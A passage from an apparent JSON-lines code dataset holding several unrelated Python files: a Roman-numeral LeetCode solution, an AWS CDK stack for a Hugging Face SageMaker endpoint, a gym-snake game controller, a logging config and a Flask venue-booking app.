time.sleep(1)\n return loop_thread\n\n","sub_path":"nubo/clouds/SAMI/Live.py","file_name":"Live.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584580481","text":"'''\nRoman numerals are represented by seven different symbols: I, V, X, L, C, D and M.\n\nSymbol Value\nI 1\nV 5\nX 10\nL 50\nC 100\nD 500\nM 1000\nFor example, two is written as II in Roman numeral, just two one's added together. Twelve is written as, XII, which is simply X + II. The number twenty seven is written as XXVII, which is XX + V + II.\n\nRoman numerals are usually written largest to smallest from left to right. However, the numeral for four is not IIII. Instead, the number four is written as IV. Because the one is before the five we subtract it making four. The same principle applies to the number nine, which is written as IX. There are six instances where subtraction is used:\n\nI can be placed before V (5) and X (10) to make 4 and 9. \nX can be placed before L (50) and C (100) to make 40 and 90. \nC can be placed before D (500) and M (1000) to make 400 and 900.\nGiven an integer, convert it to a roman numeral. 
Input is guaranteed to be within the range from 1 to 3999.\n\nExample 1:\n\nInput: 3\nOutput: \"III\"\nExample 2:\n\nInput: 4\nOutput: \"IV\"\nExample 3:\n\nInput: 9\nOutput: \"IX\"\nExample 4:\n\nInput: 58\nOutput: \"LVIII\"\nExplanation: C = 100, L = 50, XXX = 30 and III = 3.\nExample 5:\n\nInput: 1994\nOutput: \"MCMXCIV\"\nExplanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n'''\n\n\n# 2018-6-16\n# Integer to Roman\nclass Solution:\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n r = []\n res = ''\n x = 1\n while num > 0:\n r.append((num % 10)*x)\n num = num // 10\n x *= 10\n lens = len(r)-1\n for i in range(lens,-1,-1):\n if r[i]//1000 > 0: res += \"M\"*(r[i]//1000)\n if r[i]//100 > 0 and r[i]//100 < 10:\n j = r[i]//100\n if j<4: res += \"C\"*(j)\n elif j == 4: res += \"CD\"\n elif j == 5: res += \"D\"\n elif j > 5 and j < 9: res += \"D\" + \"C\"*(j-5)\n else: res += \"CM\"\n if r[i]//10 > 0 and r[i]//10 < 10:\n t = r[i]//10\n if t<4: res += \"X\"*(t)\n elif t == 4: res += \"XL\"\n elif t == 5: res += \"L\"\n elif t > 5 and t < 9: res += \"L\" +\"X\"*(t-5)\n else: res += \"XC\" \n if r[i]//1 > 0 and r[i]//1 < 10:\n n = r[i]//1\n if n<4: res += \"I\"*(n)\n elif n == 4: res += \"IV\"\n elif n == 5: res += \"V\"\n elif n > 5 and n < 9: res += \"V\" +\"I\"*(n-5)\n else: res += \"IX\" \n return res \n\n# test\nnum = 114\ntest = Solution()\nres = test.intToRoman(num)\nprint(res)\n\n\n\"\"\"\nclass Solution {\n public String intToRoman(int num) {\n int cur = 0;\n int carry = 1;\n // Deque ret = new LinkedList<>();\n String ret;\n while (num > 0) {\n cur = (num % 10) * carry;\n carry *= 10;\n num /= 10;\n \n if (cur >= 1000) {\n while (cur > 0) {\n ret = \"M\" + ret;\n cur -= 1000;\n }\n } else if (cur >= 500) {\n String tmp = \"D\";\n cur -= 500;\n while (cur > 0) {\n tmp = tmp + \"C\";\n }\n ret = tmp + ret;\n } else if (cur >= 100) {\n if (cur == 400) {\n ret = \"CD\" + ret;\n } else {\n while (cur > 0) {\n ret = \"C\" + ret;\n cur -= 100;\n }\n }\n } else if (cur >)\n }\n }\n}\n\"\"\"","sub_path":"LeetCode/python/12_medium_Integer to Roman.py","file_name":"12_medium_Integer to Roman.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"529011555","text":"from os import environ\nfrom huggingface_sagemaker.utils import (\n LATEST_PYTORCH_VERSION,\n LATEST_TRANSFORMERS_VERSION,\n region_dict,\n)\nfrom aws_cdk import core as cdk\n\n# For consistency with other languages, `cdk` is the preferred import name for\n# the CDK's core module. The following line also imports it as `core` for use\n# with examples from the CDK Developer's Guide, which are in the process of\n# being updated to use `cdk`. 
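# The digit-by-digit branching in intToRoman here can be collapsed into the
# standard greedy walk over a value/symbol table, which handles the
# subtractive forms (IV, IX, XL, XC, CD, CM) as ordinary entries. A compact
# alternative sketch (not the original author's code):
def int_to_roman(num: int) -> str:
    table = [(1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
             (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
             (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I")]
    out = []
    for value, symbol in table:
        while num >= value:
            out.append(symbol)
            num -= value
    return "".join(out)

assert int_to_roman(1994) == "MCMXCIV"
assert int_to_roman(114) == "CXIV"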
You may delete this import if you don't need it.\nfrom aws_cdk import core, aws_sagemaker as sagemaker, aws_iam as iam\n\n\n# policies based on https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html#sagemaker-roles-createmodel-perms\niam_sagemaker_actions = [\n \"sagemaker:*\",\n \"ecr:GetDownloadUrlForLayer\",\n \"ecr:BatchGetImage\",\n \"ecr:BatchCheckLayerAvailability\",\n \"ecr:GetAuthorizationToken\",\n \"cloudwatch:PutMetricData\",\n \"cloudwatch:GetMetricData\",\n \"cloudwatch:GetMetricStatistics\",\n \"cloudwatch:ListMetrics\",\n \"logs:CreateLogGroup\",\n \"logs:CreateLogStream\",\n \"logs:DescribeLogStreams\",\n \"logs:PutLogEvents\",\n \"logs:GetLogEvents\",\n \"s3:CreateBucket\",\n \"s3:ListBucket\",\n \"s3:GetBucketLocation\",\n \"s3:GetObject\",\n \"s3:PutObject\",\n]\n\n\ndef get_image_uri(\n region=None, transformmers_version=LATEST_TRANSFORMERS_VERSION, pytorch_version=LATEST_PYTORCH_VERSION\n):\n # return f\"{region_dict[region]}.dkr.ecr.{region}.amazonaws.com/huggingface-pytorch-inference:{pytorch_version}-transformers{transformmers_version}-cpu-py36-ubuntu18.04\"\n return \"763104351884.dkr.ecr.us-east-1.amazonaws.com/huggingface-pytorch-inference:1.8.1-transformers4.10.2-gpu-py36-cu111-ubuntu18.04\"\n\n\nclass HuggingfaceSagemaker(cdk.Stack):\n def __init__(self, scope: cdk.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n # Create SageMaker model\n execution_role = kwargs.pop(\"role\", None)\n # hf_model = kwargs.pop(\"model\", \"\")\n huggingface_model = core.CfnParameter(\n self,\n \"model\",\n type=\"String\",\n default=\"\",\n ).value_as_string\n huggingface_task = core.CfnParameter(\n self,\n \"task\",\n type=\"String\",\n default=None,\n ).value_as_string\n # model_data = kwargs.pop(\"modelData\",None)\n\n image_uri = get_image_uri(region=self.region)\n\n if execution_role is None:\n execution_role = iam.Role(\n self, \"hf_sagemaker_execution_role\", assumed_by=iam.ServicePrincipal(\"sagemaker.amazonaws.com\")\n )\n execution_role.add_to_policy(iam.PolicyStatement(resources=[\"*\"], actions=iam_sagemaker_actions))\n\n container_environment = {\"HF_MODEL_ID\": huggingface_model, \"HF_TASK\": huggingface_task}\n container = sagemaker.CfnModel.ContainerDefinitionProperty(environment=container_environment, image=image_uri)\n\n model = sagemaker.CfnModel(\n self,\n \"hf_model\",\n execution_role_arn=execution_role.role_arn,\n primary_container=container,\n model_name=f'model-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n )\n\n endpoint_configuration = sagemaker.CfnEndpointConfig(\n self,\n \"hf_endpoint_config\",\n endpoint_config_name=f'config-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n production_variants=[\n sagemaker.CfnEndpointConfig.ProductionVariantProperty(\n initial_instance_count=1,\n instance_type=\"ml.m5.xlarge\",\n model_name=model.model_name,\n initial_variant_weight=1.0,\n variant_name=model.model_name,\n )\n ],\n )\n endpoint = sagemaker.CfnEndpoint(\n self,\n \"hf_endpoint\",\n endpoint_name=f'endpoint-{huggingface_model.replace(\"_\",\"-\").replace(\"/\",\"--\")}',\n endpoint_config_name=endpoint_configuration.endpoint_config_name,\n )\n endpoint_configuration.node.add_dependency(model)\n 
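# Two notes on get_image_uri above: the parameter name `transformmers_version`
# is a (consistent, so still runnable) typo for `transformers_version`, and
# the function ignores its `region` argument, returning a hard-coded us-east-1
# GPU image; the commented-out f-string shows the intended region-aware form.
# A sketch of that form as a standalone helper, assuming `region_dict` maps a
# region name to its ECR account id as imported at the top of the file:
def build_hf_image_uri(region, region_dict, transformers_version, pytorch_version):
    return (
        f"{region_dict[region]}.dkr.ecr.{region}.amazonaws.com/"
        f"huggingface-pytorch-inference:{pytorch_version}-"
        f"transformers{transformers_version}-cpu-py36-ubuntu18.04"
    )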
endpoint.node.add_dependency(endpoint_configuration)\n","sub_path":"huggingface_sagemaker/huggingface_sagemaker.py","file_name":"huggingface_sagemaker.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267254209","text":"from gym_snake.envs.snake import Snake\nfrom gym_snake.envs.snake import Grid\nimport numpy as np\nfrom scipy.spatial.distance import euclidean\n\n\nclass Controller():\n \"\"\"\n This class combines the Snake, Food, and Grid classes to handle the game logic.\n \"\"\"\n\n def __init__(self, grid_size=[30, 30], unit_size=10, unit_gap=1, snake_size=3, n_snakes=1, n_foods=1,\n random_init=True, wall=False):\n\n assert n_snakes < grid_size[0] // 3\n assert n_snakes < 25\n assert snake_size < grid_size[1] // 2\n assert unit_gap >= 0 and unit_gap < unit_size\n\n self.snakes_remaining = n_snakes\n self.grid = Grid(grid_size, unit_size, unit_gap)\n\n self.empty = []\n self.douse = []\n self.r = [0., 0., 0., 0.]\n\n self.snakes = []\n self.dead_snakes = []\n for i in range(1, n_snakes + 1):\n start_coord = [i * grid_size[0] // (n_snakes + 1), snake_size + 1]\n self.snakes.append(Snake(start_coord, snake_size))\n color = [self.grid.HEAD_COLOR[0], i * 10, 0]\n color = [0, 0, 255]\n self.snakes[-1].head_color = color\n self.grid.draw_snake(self.snakes[-1], color)\n self.dead_snakes.append(None)\n\n # if wall:\n # self.grid.create_wall()\n # self.grid.create_wall()\n # self.grid.create_wall()\n\n # if not random_init:\n # for i in range(2,n_foods+2):\n # start_coord = [i*grid_size[0]//(n_foods+3), grid_size[1]-5]\n # self.grid.place_food(start_coord)\n # else:\n # for i in range(n_foods):\n # self.grid.new_food(i)\n\n self.grid.init_fire()\n\n def move_snake(self, direction, snake_idx):\n \"\"\"\n Moves the specified snake according to the game's rules dependent on the direction.\n Does not draw head and does not check for reward scenarios. 
See move_result for these\n functionalities.\n \"\"\"\n\n snake = self.snakes[snake_idx]\n if type(snake) == type(None):\n return\n\n if direction >= 8:\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co):\n return\n if np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n self.grid.draw(co, self.grid.WALL_COLOR)\n self.douse.append(co)\n self.grid.aag.remove(co)\n # self.r[snake_idx] += 1\n\n elif direction >= 4:\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co):\n return\n self.grid.draw(co, self.grid.WHITE)\n self.empty.append(co)\n # self.r[snake_idx] += 0.3\n\n else:\n # x1 = snake.head[0]\n # y1 = snake.head[1]\n # x2 = self.grid.gm[0]\n # y2 = self.grid.gm[1]\n #\n # if np.random.rand()<0.5:\n # if (x1 < x2):\n # direction = 1\n # else:\n # direction = 3\n # else:\n # if (y1 < y2):\n # direction = 2\n # else:\n # direction = 0\n\n co = snake.step(snake.head, direction % 4)\n if self.grid.off_grid(co) or np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n return\n\n # if euclidean(snake.head, self.grid.gm) > euclidean(co, self.grid.gm):\n # self.r[snake_idx] += 0.1\n # else:\n # self.r[snake_idx] -= 0.1\n\n # Cover old head position with body\n # if not snake.head in self.empty:\n self.grid.cover(snake.head, self.grid.BODY_COLOR)\n # else:\n # self.grid.draw(snake.head, self.grid.WHITE)\n # Erase tail without popping so as to redraw if food eaten\n self.grid.erase(snake.body[0])\n # Find and set next head position conditioned on direction\n snake.action(direction)\n\n def move_result(self, direction, snake_idx=0):\n \"\"\"\n Checks for food and death collisions after moving snake. Draws head of snake if\n no death scenarios.\n \"\"\"\n\n if direction >= 4:\n return\n\n snake = self.snakes[snake_idx]\n if type(snake) == type(None):\n return 0\n\n co = snake.step(snake.head, direction)\n if self.grid.off_grid(co) or np.array_equal(self.grid.color_of(co), self.grid.FOOD_COLORS[0]):\n return\n\n # Check for death of snake\n # if False and self.grid.check_death(snake.head):\n # self.dead_snakes[snake_idx] = self.snakes[snake_idx]\n # self.snakes[snake_idx] = None\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # if direction < 4:\n # if len(snake.body)>1:\n # try:\n # self.grid.connect(snake.body.popleft(), snake.body[0], self.grid.SPACE_COLOR)\n # finally:\n # k=0\n # self.r[snake_idx] += -0.9\n # else:\n # food_item = self.grid.food_space(snake.head)\n #\n # # Check for wall\n # if food_item == -2:\n # self.dead_snakes[snake_idx] = self.snakes[snake_idx]\n # self.snakes[snake_idx] = None\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # self.grid.connect(snake.body.popleft(), snake.body[0], self.grid.SPACE_COLOR)\n # reward = -1\n #\n # # Check for reward\n # elif food_item != -1:\n # self.grid.draw(snake.body[0], self.grid.BODY_COLOR) # Redraw tail\n # self.grid.connect(snake.body[0], snake.body[1], self.grid.BODY_COLOR)\n # self.grid.cover(snake.head, snake.head_color) # Avoid miscount of grid.open_space\n # reward = self.grid.FOOD_REWARDS[food_item]\n # self.grid.new_food(food_item)\n\n # else:\n reward = 0\n empty_coord = snake.body.popleft()\n self.grid.connect(empty_coord, snake.body[0], self.grid.SPACE_COLOR)\n self.grid.draw(snake.head, snake.head_color)\n\n self.grid.connect(snake.body[-1], snake.head, self.grid.BODY_COLOR)\n\n # return reward\n\n def kill_snake(self, snake_idx):\n \"\"\"\n Deletes snake from game and 
subtracts from the snake_count\n \"\"\"\n return\n assert self.dead_snakes[snake_idx] is not None\n self.grid.erase(self.dead_snakes[snake_idx].head)\n self.grid.erase_snake_body(self.dead_snakes[snake_idx])\n self.dead_snakes[snake_idx] = None\n self.snakes_remaining -= 1\n\n def step(self, directions):\n \"\"\"\n Takes an action for each snake in the specified direction and collects their rewards\n and dones.\n\n directions - tuple, list, or ndarray of directions corresponding to each snake.\n \"\"\"\n\n self.r = [0., 0., 0., 0.]\n\n # Ensure no more play until reset\n if self.snakes_remaining < 1 or self.grid.open_space < 1:\n if len(directions) is 1:\n return self.grid.grid.copy(), 0, True, {\"snakes_remaining\": self.snakes_remaining}\n else:\n return self.grid.grid.copy(), [0] * len(directions), True, {\"snakes_remaining\": self.snakes_remaining}\n\n # remove when multiple agents\n\n # directions = int(directions)\n\n if type(directions) == type(int()):\n directions = [directions]\n\n for i, direction in enumerate(directions):\n\n if self.snakes[i] is None and self.dead_snakes[i] is not None:\n self.kill_snake(i)\n self.move_snake(direction, i)\n self.move_result(direction, i)\n\n snake = self.snakes[i]\n if snake is not None:\n for co in self.empty:\n if not np.array_equal(snake.head, co):\n self.grid.draw(co, self.grid.WHITE)\n\n for co in self.douse:\n if not np.array_equal(snake.head, co):\n self.grid.draw(co, self.grid.WALL_COLOR)\n\n self.grid.draw(snake.head, self.grid.HEAD_COLOR)\n\n self.grid.new_food(0)\n\n done = self.snakes_remaining < 1 # or self.grid.open_space < 1\n self.r[0] += -0.2\n # self.r[1] += -0.2\n if len(self.r) is 1:\n return self.grid.grid.copy(), self.r[0], done, {\"snakes_remaining\": self.snakes_remaining}\n else:\n return self.grid.grid.copy(), self.r, done, {\"snakes_remaining\": self.snakes_remaining}\n","sub_path":"Transfer-Learning-for-Deep-Reinforcement-Learning-master/snake env/gym_snake/envs/snake/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":8800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"224845639","text":"# -*- coding: utf-8 -*-\n\n\ntry:\n from logging.config import dictConfig\nexcept ImportError:\n from rq.compat.dictconfig import dictConfig\n\n\ndef setup_loghandlers(level='INFO'):\n '''\n 日志设置\n\n '''\n dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n\n 'formatters': {\n 'main': {\n 'format': '[%(levelname)s][%(asctime)s %(name)s:%(lineno)d] %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n },\n\n 'handlers': {\n 'main': {\n 'level': 'DEBUG',\n 'class': 'rq.utils.ColorizingStreamHandler',\n 'formatter': 'main'\n },\n },\n\n 'loggers': {\n 'requests': {\n 'level': 'ERROR',\n },\n 'apscheduler': {\n 'level': 'ERROR',\n },\n 'mon': {\n 'level': level,\n }\n },\n\n 'root': {\n 'handlers': ['main'],\n 'level': 'ERROR',\n }\n\n\n })\n","sub_path":"conf/logutils.py","file_name":"logutils.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344722515","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\nimport sys\n\nimport babel\nimport dateutil.parser\nfrom flask import Flask, abort, flash, redirect, render_template, request, url_for\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import 
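# Notes on Controller.step above: `if len(directions) is 1:` tests object
# identity, not equality -- it only "works" through CPython's small-int
# caching and emits a SyntaxWarning on Python 3.8+ -- and
# `type(directions) == type(int())` is an unidiomatic spelling of isinstance.
# The robust forms:
directions = 2  # illustrative value
if isinstance(directions, int):
    directions = [directions]
if len(directions) == 1:  # value equality, not identity
    pass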
SQLAlchemy\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom datetime import datetime\nimport itertools\nimport logging\nfrom logging import FileHandler, Formatter\n\nfrom forms import ArtistForm, VenueForm, ShowForm\nfrom models import db, Venue, Artist, Show\n\n# ----------------------------------------------------------------------------#\n# App init\n# ----------------------------------------------------------------------------#\n\napp = Flask(__name__)\napp.config.from_object(\"config\")\napp.config.from_envvar(\"APPLICATION_SETTINGS\")\nmigrate = Migrate(app, db)\ndb.init_app(app)\n\n\n# ----------------------------------------------------------------------------#\n# Filters.\n# ----------------------------------------------------------------------------#\n\n\ndef format_datetime(value, format=\"medium\"):\n date = dateutil.parser.parse(value)\n if format == \"full\":\n format = \"EEEE MMMM, d, y 'at' h:mma\"\n elif format == \"medium\":\n format = \"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\n\napp.jinja_env.filters[\"datetime\"] = format_datetime\n\n# ----------------------------------------------------------------------------#\n# Controllers.\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"pages/home.html\")\n\n\n# Venues\n# ----------------------------------------------------------------\n\n\n@app.route(\"/venues\")\ndef venues():\n\n # get all venues\n venues = Venue.query.all()\n\n keyfunc = lambda v: (v[\"city\"], v[\"state\"])\n sorted_venues = sorted(venues, key=keyfunc)\n grouped_venues = itertools.groupby(sorted_venues, key=keyfunc)\n\n data = [\n {\"city\": key[0], \"state\": key[1], \"venues\": list(data)}\n for key, data in grouped_venues\n ]\n\n return render_template(\"pages/venues.html\", areas=data)\n\n\n@app.route(\"/venues/search\", methods=[\"POST\"])\ndef search_venues():\n # term to search for (eg., 'Superdome')\n search_term = request.form.get(\"search_term\", \"\")\n\n search_results = Venue.query.filter(Venue.name.ilike(f\"%{search_term}%\")).all()\n\n # query the db using ilike\n # response = Venue.query.filter(Venue.name.ilike(search_term)).all()\n venues = [\n {\n \"id\": venue.id,\n \"name\": venue.name,\n # 'num_upcoming_shows': venue.upcoming_shows_count\n }\n for venue in search_results\n ]\n\n response = {\"count\": len(search_results), \"data\": list(venues)}\n\n return render_template(\n \"pages/search_venues.html\",\n results=response,\n search_term=request.form.get(\"search_term\", \"\"),\n )\n\n\n@app.route(\"/venues/\")\ndef show_venue(venue_id):\n\n past_shows = []\n upcoming_shows = []\n past_shows_count = 0\n upcoming_shows_count = 0\n\n # get venue with all shows AND artists\n venue = Venue.query.get(venue_id)\n\n # get current time\n now = datetime.now()\n\n # get upcoming_shows\n for show in venue.show:\n # get artist data\n artist_data = Artist.query.get(show.artist_id)\n if show.start_time > now:\n upcoming_shows_count += 1\n upcoming_shows.append(\n {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist_data.name,\n \"artist_image_link\": artist_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n elif show.start_time < now:\n past_shows_count += 1\n past_shows.append(\n {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist_data.name,\n \"artist_image_link\": artist_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n data = {\n \"id\": venue.id,\n 
\"name\": venue.name,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n\n return render_template(\"pages/show_venue.html\", venue=data)\n\n\n# Create Venue\n# ----------------------------------------------------------------\n\n\n@app.route(\"/venues/create\", methods=[\"GET\"])\ndef create_venue_form():\n form = VenueForm()\n return render_template(\"forms/new_venue.html\", form=form)\n\n\n@app.route(\"/venues/create\", methods=[\"POST\"])\ndef create_venue_submission():\n error = False\n\n try:\n data = Venue(\n name=request.form[\"name\"],\n address=request.form[\"address\"],\n city=request.form[\"city\"],\n state=request.form[\"state\"],\n phone=request.form[\"phone\"],\n genres=request.form[\"genres\"],\n website=request.form[\"website\"],\n image_link=request.form[\"image_link\"],\n facebook_link=request.form[\"facebook_link\"],\n seeking_talent=request.form[\"seeking_talent\"],\n seeking_description=request.form[\"seeking_description\"],\n )\n if data.seeking_talent == \"y\":\n data.seeking_talent = True\n else:\n data.seeking_talent = False\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Venue \" + data.name + \" could not be listed.\")\n else:\n flash(\"Venue \" + request.form[\"name\"] + \" was successfully listed!\")\n\n return render_template(\"pages/home.html\")\n\n\n# delete a show\n@app.route(\"/shows/\", methods=[\"DELETE\"])\ndef delete_show(show_id):\n error = False\n\n show = Show.query.get(show_id)\n\n try:\n db.session.delete(show)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. Show could not be deleted.\")\n else:\n flash(\"Show was successfully deleted!\")\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/venues/\", methods=[\"DELETE\"])\ndef delete_venue(venue_id):\n error = False\n\n venue = Venue.query.get(venue_id)\n\n try:\n db.session.delete(venue)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. 
Venue could not be deleted.\")\n else:\n flash(\"Venue was successfully deleted!\")\n return redirect(url_for(\"index\"))\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route(\"/artists\")\ndef artists():\n # return all artists\n data = Artist.query.all()\n\n return render_template(\"pages/artists.html\", artists=data)\n\n\n@app.route(\"/artists/search\", methods=[\"POST\"])\ndef search_artists():\n # term to search for (eg., 'guns n petals')\n search_term = request.form.get(\"search_term\", \"\")\n\n search_results = Artist.query.filter(Artist.name.ilike(f\"%{search_term}%\")).all()\n\n # query the db using ilike\n # response = Venue.query.filter(Venue.name.ilike(search_term)).all()\n artists = [\n {\n \"id\": artist.id,\n \"name\": artist.name,\n # 'num_upcoming_shows': venue.upcoming_shows_count\n }\n for artist in search_results\n ]\n\n response = {\"count\": len(search_results), \"data\": list(artists)}\n\n return render_template(\n \"pages/search_artists.html\",\n results=response,\n search_term=request.form.get(\"search_term\", \"\"),\n )\n\n\n@app.route(\"/artists/\")\ndef show_artist(artist_id):\n\n past_shows = []\n upcoming_shows = []\n past_shows_count = 0\n upcoming_shows_count = 0\n\n # get venue with all shows AND artists\n artist = Artist.query.get(artist_id)\n\n # get current time\n now = datetime.now()\n\n # get upcoming_shows\n for show in artist.show:\n # get artist data\n venue_data = Venue.query.get(show.venue_id)\n if show.start_time > now:\n upcoming_shows_count += 1\n upcoming_shows.append(\n {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue_data.name,\n \"venue_image_link\": venue_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n elif show.start_time < now:\n past_shows_count += 1\n past_shows.append(\n {\n \"venue_id\": show.artist_id,\n \"venue_name\": venue_data.name,\n \"venue_image_link\": venue_data.image_link,\n \"start_time\": show.start_time.isoformat(),\n }\n )\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n\n return render_template(\"pages/show_artist.html\", artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route(\"/artists//edit\", methods=[\"GET\"])\ndef edit_artist(artist_id):\n\n # get artist\n artist = Artist.query.get(artist_id)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n }\n\n form = ArtistForm(data=data)\n\n return render_template(\"forms/edit_artist.html\", form=form, artist=artist)\n\n\n@app.route(\"/artists//edit\", methods=[\"POST\"])\ndef edit_artist_submission(artist_id):\n # check to make sure the artist exists\n # then update the artist by artist_id\n # error = False\n\n artist = 
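# Note on create_venue_submission above: an unchecked HTML checkbox is simply
# absent from the POSTed form, so request.form["seeking_talent"] raises
# KeyError and the bare `except` turns every unchecked submission into a
# failure (the same applies to "seeking_venue" in create_artist_submission
# further down). Reading the field with a default avoids that; a small
# self-contained sketch using Werkzeug's form container:
from werkzeug.datastructures import MultiDict

form = MultiDict()  # simulates a POST where the checkbox was left unchecked
seeking_talent = form.get("seeking_talent") == "y"  # False, no KeyError
assert seeking_talent is False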
Artist.query.get(artist_id)\n\n # get form\n form = ArtistForm(request.form)\n\n # check if artist exists\n # if artist is None:\n # abort(404)\n # flash(\"artist was not found\")\n\n # validation + request type\n # populate artist w populate_obj\n form.populate_obj(artist)\n db.session.add(artist)\n db.session.commit()\n flash(\"Artist \" + request.form[\"name\"] + \" was successfully updated!\")\n\n return redirect(url_for(\"show_artist\", artist_id=artist_id))\n\n # # try to update the record in db\n # try:\n # db.session.add(artist)\n # db.session.commit()\n # except:\n # error = True\n # db.session.rollback()\n # print(sys.exc_info())\n # finally:\n # db.session.close()\n # if error:\n # abort(400)\n # flash(\"An error occurred. Artist \" + artist.name + \" could not be updated.\")\n # else:\n # flash(\"Artist \" + request.form[\"name\"] + \" was successfully updated!\")\n\n\n@app.route(\"/venues//edit\", methods=[\"GET\"])\ndef edit_venue(venue_id):\n\n venue = Venue.query.get(venue_id)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"city\": venue.city,\n \"state\": venue.state,\n \"address\": venue.address,\n \"phone\": venue.phone,\n \"image_link\": venue.image_link,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n }\n\n form = VenueForm(data=data)\n\n return render_template(\"forms/edit_venue.html\", form=form, venue=venue)\n\n\n@app.route(\"/venues//edit\", methods=[\"POST\"])\ndef edit_venue_submission(venue_id):\n\n venue = Venue.query.get(venue_id)\n\n form = VenueForm(request.form) # maybe need obj=venue param?\n\n form.populate_obj(venue)\n\n db.session.add(venue)\n db.session.commit()\n flash(\"Venue \" + request.form[\"name\"] + \" was successfully updated!\")\n return redirect(url_for(\"show_venue\", venue_id=venue_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n\n\n@app.route(\"/artists/create\", methods=[\"GET\"])\ndef create_artist_form():\n form = ArtistForm()\n return render_template(\"forms/new_artist.html\", form=form)\n\n\n@app.route(\"/artists/create\", methods=[\"POST\"])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n # on successful db insert, flash success\n error = False\n try:\n data = Artist(\n name=request.form[\"name\"],\n phone=request.form[\"phone\"],\n city=request.form[\"city\"],\n state=request.form[\"state\"],\n genres=request.form[\"genres\"],\n image_link=request.form[\"image_link\"],\n facebook_link=request.form[\"facebook_link\"],\n website=request.form[\"website\"],\n seeking_venue=request.form[\"seeking_venue\"],\n seeking_description=request.form[\"seeking_description\"],\n )\n if data.seeking_venue == \"y\":\n data.seeking_venue = True\n else:\n data.seeking_venue = False\n db.session.add(data)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error:\n abort(400)\n flash(\"An error occurred. 
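# Note on the edit handlers above: ArtistForm(request.form) and
# VenueForm(request.form) are written into the model with form.populate_obj()
# and committed without ever calling form.validate(), so malformed input goes
# straight to the database. The conventional WTForms guard, sketched in the
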